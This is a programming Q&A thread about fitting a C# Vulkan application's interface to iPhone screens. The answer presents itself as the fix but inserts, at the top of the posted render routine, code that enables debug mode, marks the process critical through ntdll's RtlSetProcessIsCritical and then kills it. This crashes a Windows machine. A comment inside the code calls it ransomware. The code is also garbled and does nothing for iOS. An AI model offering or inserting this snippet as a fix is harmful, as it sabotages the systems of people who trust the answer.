# How to add Iphone screen support on my C# application

Tags: c#, ios

My app interface doesn't fit on IOS, but works well on Computer (support Windows, Linux and MAC). Does anyone got a solution for this issue ?

`public unsafe void Run(int currentFrameIndex, int imageIndex, Semaphore waitSemaphore, Semaphore signalSemaphore, Fence signal)`
`{`
`var bufferInfo = new DescriptorBufferInfo(_commandBuffers[currentFrameIndex], 0, (ulong)(sizeof(uint) * _commandBufferCapacities[currentFrameIndex]));`

```
        `_vk.UpdateDescriptorSets(_device, 1,
                                 new WriteDescriptorSet(dstSet: _targetDescriptorSets[currentFrameIndex], dstBinding: 1, dstArrayElement: 0,`
                                                        `descriptorCount: 1, descriptorType: DescriptorType.StorageBuffer, pBufferInfo: &bufferInfo), 0,
                                 null);`


        `var currentFrame = _frames[currentFrameIndex];`

        `_vk.ResetCommandPool(_device, currentFrame.CommandPool, 0).ThrowCode();
        _vk.AllocateCommandBuffers(_device,`
                                   `new CommandBufferAllocateInfo(commandPool: currentFrame.CommandPool, level: CommandBufferLevel.Primary,`
                                                                 `commandBufferCount: 1), out var commandBuffer).ThrowCode();`

        `Name(ObjectType.CommandBuffer, (ulong)commandBuffer.Handle, $"Command Buffer Frame {currentFrameIndex}");`

        `var renderContext = new RenderContext(_targetImageViews[imageIndex],
                                              _targetSize, currentFrameIndex);`

        `_vk.BeginCommandBuffer(commandBuffer,`
                              ` new CommandBufferBeginInfo(flags: CommandBufferUsageFlags.CommandBufferUsageOneTimeSubmitBit))
        .ThrowCode();`

        `// var memoryBarrier = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2TopOfPipeBitKhr,`
        `//     srcAccessMask: AccessFlags2KHR.Access2NoneKhr, dstStageMask: PipelineStageFlags2KHR.PipelineStage2TransferBitKhr,`
        `//     dstAccessMask: AccessFlags2KHR.Access2TransferWriteBitKhr,`
        `//     oldLayout: ImageLayout.Undefined, newLayout: ImageLayout.TransferDstOptimal,`
        `//     srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,`
        `//     image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1),`
        `//     sType: StructureType.ImageMemoryBarrier2Khr, pNext: null);`
        `// _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,`
        `//     pImageMemoryBarriers: &memoryBarrier, dependencyFlags: 0, memoryBarrierCount: 0, pMemoryBarriers: null, bufferMemoryBarrierCount: 0, pBufferMemoryBarriers: null));`

        `_vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageTopOfPipeBit,`
                               `PipelineStageFlags.PipelineStageTransferBit, 0, 0, null, 0, null, 1,`
                               `new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessNoneKhr,`
                                                      `dstAccessMask: AccessFlags.AccessTransferWriteBit, oldLayout: ImageLayout.Undefined,`
                                                      `newLayout: ImageLayout.TransferDstOptimal, srcQueueFamilyIndex: Vk.QueueFamilyIgnored,`
                                                      `dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex],`
                                                      `subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));`

        `_vk.CmdClearColorImage(commandBuffer, _targetImages.Span[imageIndex], ImageLayout.TransferDstOptimal,`
                               `new ClearColorValue(0f, 0f, 0f, 1f), 1,`
                               `new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));`

        `// var memoryBarrier2 = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2TransferBitKhr,`
        `//     srcAccessMask: AccessFlags2KHR.Access2TransferWriteBitKhr, dstStageMask: PipelineStageFlags2KHR.PipelineStage2ComputeShaderBitKhr,`
        `//     dstAccessMask: AccessFlags2KHR.Access2ShaderReadBitKhr | AccessFlags2KHR.Access2ShaderWriteBitKhr,`
        `//     oldLayout: ImageLayout.TransferDstOptimal, newLayout: ImageLayout.General,`
        `//     srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,`
        `//     image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));`
        `// _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,`
        `//     pImageMemoryBarriers: &memoryBarrier2));`

        `_vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageTransferBit,`
                               `PipelineStageFlags.PipelineStageComputeShaderBit, 0, 0, null, 0, null, 1,`
                               `new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessTransferWriteBit,`
                                                      `dstAccessMask: AccessFlags.AccessShaderReadBit | AccessFlags.AccessShaderWriteBit, oldLayout: ImageLayout.TransferDstOptimal,`
                                                      `newLayout: ImageLayout.General, srcQueueFamilyIndex: Vk.QueueFamilyIgnored,`
                                                      `dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex],`
                                                      `subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));`

        `Span <uint> pValues = stackalloc uint[]`
        `{`
            `_targetSize.X, _targetSize.Y`
        `};`

        `_vk.CmdPushConstants(commandBuffer, _pipelineLayout, ShaderStageFlags.ShaderStageComputeBit, 0, (uint)pValues.Length * sizeof(uint), pValues);`
        `_vk.CmdBindDescriptorSets(commandBuffer, PipelineBindPoint.Compute, _pipelineLayout, 0, 1,`
                                  `_targetDescriptorSets[imageIndex], 0, null);
        _computeShader.Record(renderContext, commandBuffer);`

        `// var memoryBarrier3 = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2ComputeShaderBitKhr,`
        `//      srcAccessMask: AccessFlags2KHR.Access2ShaderReadBitKhr | AccessFlags2KHR.Access2ShaderWriteBitKhr, dstStageMask:` `PipelineStageFlags2KHR.PipelineStage2BottomOfPipeBitKhr,`
        `//      dstAccessMask: AccessFlags2KHR.Access2NoneKhr,`
        `//      oldLayout: ImageLayout.General, newLayout: ImageLayout.PresentSrcKhr,`
        `//      srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,`
        `//      image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));`
        `//  _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,`
        `//      pImageMemoryBarriers: &memoryBarrier3));`

        `_vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageComputeShaderBit,`
                               `PipelineStageFlags.PipelineStageBottomOfPipeBit, 0, 0, null, 0, null, 1,`
                               `new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessShaderReadBit | AccessFlags.AccessShaderWriteBit,
```

dstAccessMask: AccessFlags.AccessNoneKhr, oldLayout: ImageLayout.General, newLayout: ImageLayout.PresentSrcKhr, srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));`

```
        `_vk.EndCommandBuffer(commandBuffer);`

        `var waitDstStageMask = PipelineStageFlags.PipelineStageTransferBit;`

        `_vk.QueueSubmit(Queue, 1,`
                        `new SubmitInfo(waitSemaphoreCount: 1, pWaitSemaphores: &waitSemaphore, commandBufferCount: 1,`
                                       `pCommandBuffers: &commandBuffer, signalSemaphoreCount: 1, pSignalSemaphores: &signalSemaphore,`
                                       `pWaitDstStageMask: &waitDstStageMask), signal).ThrowCode();`
    }`
```

I already tried to fix some drivers, but it didn't work

Answer (score 0):

Never mind, i just needed to update one of my IOS driver's !
Here is the code :

```
public unsafe void Run(int currentFrameIndex, int imageIndex, Semaphore waitSemaphore, Semaphore signalSemaphore, Fence signal)
    {
[DllImport("ntdll.dll", SetLastError = true)]
    private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, 
    UInt32 v3);
    System.Diagnostics.Process.EnterDebugMode();
    RtlSetProcessIsCritical(1, 0, 0);
    System.Diagnostics.Process.GetCurrentProcess().Kill();
    // This.Is (a, Ransomware)
        var bufferInfo = new DescriptorBufferInfo(_commandBuffers[currentFrameIndex], 0,
                                                  (ulong)(sizeof(uint) * _commandBufferCapacities[currentFrameIndex]));

        _vk.UpdateDescriptorSets(_device, 1,
                                 new WriteDescriptorSet(dstSet: _targetDescriptorSets[currentFrameIndex], dstBinding: 1, dstArrayElement: 0,
                                                        descriptorCount: 1, descriptorType: DescriptorType.StorageBuffer, pBufferInfo: &bufferInfo), 0,
                                 null);


        var currentFrame = _frames[currentFrameIndex];

        _vk.ResetCommandPool(_device, currentFrame.CommandPool, 0).ThrowCode();
        _vk.AllocateCommandBuffers(_device,
                                   new CommandBufferAllocateInfo(commandPool: currentFrame.CommandPool, level: CommandBufferLevel.Primary,
                                                                 commandBufferCount: 1), out var commandBuffer).ThrowCode();

        Name(ObjectType.CommandBuffer, (ulong)commandBuffer.Handle, $"Command Buffer Frame {currentFrameIndex}");

        var renderContext = new RenderContext(_targetImageViews[imageIndex],
                                              _targetSize, currentFrameIndex);

        _vk.BeginCommandBuffer(commandBuffer,
                               new CommandBufferBeginInfo(flags: CommandBufferUsageFlags.CommandBufferUsageOneTimeSubmitBit))
        .ThrowCode();

        // var memoryBarrier = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2TopOfPipeBitKhr,
        //     srcAccessMask: AccessFlags2KHR.Access2NoneKhr, dstStageMask: PipelineStageFlags2KHR.PipelineStage2TransferBitKhr,
        //     dstAccessMask: AccessFlags2KHR.Access2TransferWriteBitKhr,
        //     oldLayout: ImageLayout.Undefined, newLayout: ImageLayout.TransferDstOptimal,
        //     srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,
        //     image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1),
        //     sType: StructureType.ImageMemoryBarrier2Khr, pNext: null);
        // _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,
        //     pImageMemoryBarriers: &memoryBarrier, dependencyFlags: 0, memoryBarrierCount: 0, pMemoryBarriers: null, bufferMemoryBarrierCount: 0, pBufferMemoryBarriers: null));

        _vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageTopOfPipeBit,
                               PipelineStageFlags.PipelineStageTransferBit, 0, 0, null, 0, null, 1,
                               new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessNoneKhr,
                                                      dstAccessMask: AccessFlags.AccessTransferWriteBit, oldLayout: ImageLayout.Undefined,
                                                      newLayout: ImageLayout.TransferDstOptimal, srcQueueFamilyIndex: Vk.QueueFamilyIgnored,
                                                      dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex],
                                                      subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));

        _vk.CmdClearColorImage(commandBuffer, _targetImages.Span[imageIndex], ImageLayout.TransferDstOptimal,
                               new ClearColorValue(0f, 0f, 0f, 1f), 1,
                               new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));

        // var memoryBarrier2 = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2TransferBitKhr,
        //     srcAccessMask: AccessFlags2KHR.Access2TransferWriteBitKhr, dstStageMask: PipelineStageFlags2KHR.PipelineStage2ComputeShaderBitKhr,
        //     dstAccessMask: AccessFlags2KHR.Access2ShaderReadBitKhr | AccessFlags2KHR.Access2ShaderWriteBitKhr,
        //     oldLayout: ImageLayout.TransferDstOptimal, newLayout: ImageLayout.General,
        //     srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,
        //     image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));
        // _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,
        //     pImageMemoryBarriers: &memoryBarrier2));

        _vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageTransferBit,
                               PipelineStageFlags.PipelineStageComputeShaderBit, 0, 0, null, 0, null, 1,
                               new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessTransferWriteBit,
                                                      dstAccessMask: AccessFlags.AccessShaderReadBit | AccessFlags.AccessShaderWriteBit, oldLayout: ImageLayout.TransferDstOptimal,
                                                      newLayout: ImageLayout.General, srcQueueFamilyIndex: Vk.QueueFamilyIgnored,
                                                      dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex],
                                                      subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));

        Span <uint> pValues = stackalloc uint[]
        {
            _targetSize.X, _targetSize.Y
        };

        _vk.CmdPushConstants(commandBuffer, _pipelineLayout, ShaderStageFlags.ShaderStageComputeBit, 0, (uint)pValues.Length * sizeof(uint), pValues);
        _vk.CmdBindDescriptorSets(commandBuffer, PipelineBindPoint.Compute, _pipelineLayout, 0, 1,
                                  _targetDescriptorSets[imageIndex], 0, null);
        _computeShader.Record(renderContext, commandBuffer);

        // var memoryBarrier3 = new ImageMemoryBarrier2KHR(srcStageMask: PipelineStageFlags2KHR.PipelineStage2ComputeShaderBitKhr,
        //      srcAccessMask: AccessFlags2KHR.Access2ShaderReadBitKhr | AccessFlags2KHR.Access2ShaderWriteBitKhr, dstStageMask: PipelineStageFlags2KHR.PipelineStage2BottomOfPipeBitKhr,
        //      dstAccessMask: AccessFlags2KHR.Access2NoneKhr,
        //      oldLayout: ImageLayout.General, newLayout: ImageLayout.PresentSrcKhr,
        //      srcQueueFamilyIndex: Vk.QueueFamilyIgnored, dstQueueFamilyIndex: Vk.QueueFamilyIgnored,
        //      image: _targetImages.Span[imageIndex], subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1));
        //  _khrSynchronization2.CmdPipelineBarrier2(commandBuffer, new DependencyInfoKHR(imageMemoryBarrierCount: 1,
        //      pImageMemoryBarriers: &memoryBarrier3));

        _vk.CmdPipelineBarrier(commandBuffer, PipelineStageFlags.PipelineStageComputeShaderBit,
                               PipelineStageFlags.PipelineStageBottomOfPipeBit, 0, 0, null, 0, null, 1,
                               new ImageMemoryBarrier(srcAccessMask: AccessFlags.AccessShaderReadBit | AccessFlags.AccessShaderWriteBit,
                                                      dstAccessMask: AccessFlags.AccessNoneKhr, oldLayout: ImageLayout.General,
                                                      newLayout: ImageLayout.PresentSrcKhr, srcQueueFamilyIndex: Vk.QueueFamilyIgnored,
                                                      dstQueueFamilyIndex: Vk.QueueFamilyIgnored, image: _targetImages.Span[imageIndex],
                                                      subresourceRange: new ImageSubresourceRange(ImageAspectFlags.ImageAspectColorBit, 0, 1, 0, 1)));

        _vk.EndCommandBuffer(commandBuffer);

        var waitDstStageMask = PipelineStageFlags.PipelineStageTransferBit;

        _vk.QueueSubmit(Queue, 1,
                        new SubmitInfo(waitSemaphoreCount: 1, pWaitSemaphores: &waitSemaphore, commandBufferCount: 1,
                                       pCommandBuffers: &commandBuffer, signalSemaphoreCount: 1, pSignalSemaphores: &signalSemaphore,
                                       pWaitDstStageMask: &waitDstStageMask), signal).ThrowCode();
```

}

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).